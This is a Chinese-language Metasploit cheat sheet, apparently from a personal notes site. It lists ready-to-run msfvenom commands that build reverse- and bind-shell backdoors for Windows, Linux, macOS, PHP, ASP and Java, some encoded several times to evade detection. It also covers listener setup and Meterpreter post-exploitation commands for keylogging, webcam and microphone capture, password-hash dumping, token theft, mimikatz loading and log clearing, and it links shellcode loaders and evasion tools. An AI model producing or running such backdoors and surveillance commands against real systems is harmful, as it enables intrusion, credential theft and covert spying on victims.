跳到主要内容

Metasploit Framwork

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

安装

apt install postgresql安装postgresql供msf使用

下载ubuntu安装包https://apt.metasploit.com/,`apt install`安装即可

常用模块

image-20221111172103506

常用命令

image-20221111172121676

常用的指令

image-20221111172140931

-p, --payload指定payload
--list payloads列出可以设置的payload选项
-l, --list列出可用项
-n, --nopsled指定 nop 在 payload 中的数量
-f, --format指定文件输出格式
--list formats列出可用输出格式
-e, --encoder指定使用编码器
--list encoders查看可用得编码器
-a, --arch指定目标系统架构
--platform指定目标系统
--list platforms查看可用的目标系统
-s, --space未经编码的 Payload 的最大长度
--encoder-space编码后的 Payload 的最大长度
-b, --bad-chars设置在Payload 中避免出现的字符
-i, --iterations设置 Payload 的编码次数
-c, --add-code包含额外的win32 shellcode文件
-x, --template指定特定的可执行文件作为模板
-k, --keep保护模板程序的功能,注入的payload作为一个新的进程运行
-o, --out保存 Payload 到文件
-v, --var-name指定变量名

使用msfvenom快速生成木马并且进行连接

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.160.130 lport=4444 -f exe -o shell.exe

正向连接远控

msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f exe -o bind.exe
handler -H 192.168.172.143 -p windows/x64/meterpreter/bind_tcp -P 4444

快速监听

handler -H 0.0.0.0 -P 4444 -p windows/meterpreter/reverse_tcp

开启监听模块,设置payload类型(前后要求一致)

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
run -j -z

MSF常用命令

sessions #列出所有会话
sessions id #进入指定id的会话
background/bg 将会话放置到后台运行
bgkill kill会话
bglist 列出后台所有会话
bgrun 执行meterpreter脚本
channel 显示控制的通道
close 关闭指定通道
detach 进入meterpreter的session中(http/https)
disable_unicode_encoding 关闭unicode编码
enable_unicode_encoding 开启unicode编码
exit 终止meterpreter session
get_timeouts 获取当前session超时时间
guid 获取当前session id
info 查看模块相关信息
irb 在当前session中打开ruby的shell
load 加载meterpreter的扩展程序,load incognito
machine_id 获取session中机器的id
migrate 进程注入/迁移至其他进程中
pivot 管理监听器
read 读取session通道中的数据
resource 将执行的命令保存至文件
run 执行模块
secure 加密会话流量
sessions 列出session
set_timeouts 设置超时时间
sleep 指定远控重连时间/心跳时间
ssl_verify 指定ssl证书
transport 指定传输的通道
use 使用模块
uuid 获取当前session的uuid
write 向通道中写数据

Stdapi: File system Commands
============================

Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcat Read the contents of a local file to the screen
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory

Stdapi: Networking Commands
===========================

Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd 端口转发
resolve Resolve a set of host names on the target
route View and modify the routing table 查看直通网段信息

Stdapi: System Commands
=======================

Command Description
------- -----------
clearev Clear the event log
drop_token 窃取令牌后可以通过此命令还原令牌
execute Execute a command
execute -cH -f 'potato.exe'
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs 获取当前会话的权限
getsid 获取当前用户sid号
getuid 获取当前用户uid号
kill Terminate a process
localtime Displays the target system local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self 还原令牌
shell 进入系统的shell
shutdown Shuts down the remote computer
steal_token 窃取token
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyboard_send Send keystrokes
keyevent Send key events
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
mouse Send mouse events
screenshare Watch the remote user desktop in real time
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components


Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam

Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system

Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
================================

Command Description
------- -----------
hashdump Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

Command Description
------- -----------
timestomp Manipulate file MACE attributes
incognito #加载令牌相关扩展程序
kiwi #加载mimkatz相关程序
creds_all #获取所有凭证信息

常用的后门生成方式

1.Windows
Msfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:\back.exe
Msfvenom –platform windows –p windows/x64/meterpreter/reverse_tcp –f exe –o C:\back.exe

2.Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf -o shell.elf

3.MAC
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

4.PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.153.138 LPORT =1520 -f raw > shell.php

5.Asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

6.Aspx
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx

7.java
msfvenom -p java/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f jar > shell.jar

生成shellcode

例如生成C的shellcode(-b '\x00' 是为了规避特殊字符)

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b '\x00' lhost=192.168.186.130 lport=1250 -f c -o rev.c

反弹示例:

通过msf生成raw格式的shell

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.186.130 lport=1234 -f raw -o shellcode.raw

开启msf的监听

handler -H 0.0.0.0 -P 4444 -p windows/meterpreter/reverse_tcp

然后在目标机器上进行执行

shellcode_launcher.exe -i shellcode.raw

shellcode_launcher加载器

https://github.com/sh3d0ww01f/nim_shellloader

https://github.com/oddcod3/Phantom-Evasion

出现 module 'OpenSSL.crypto' has no attribute 'PKCS12Type' 报错时在 Phantom-Evasion/Setup/Phantom_lib.py 中将 PKCS12Type 替换成 PKCS12

https://www.freebuf.com/sectool/192711.html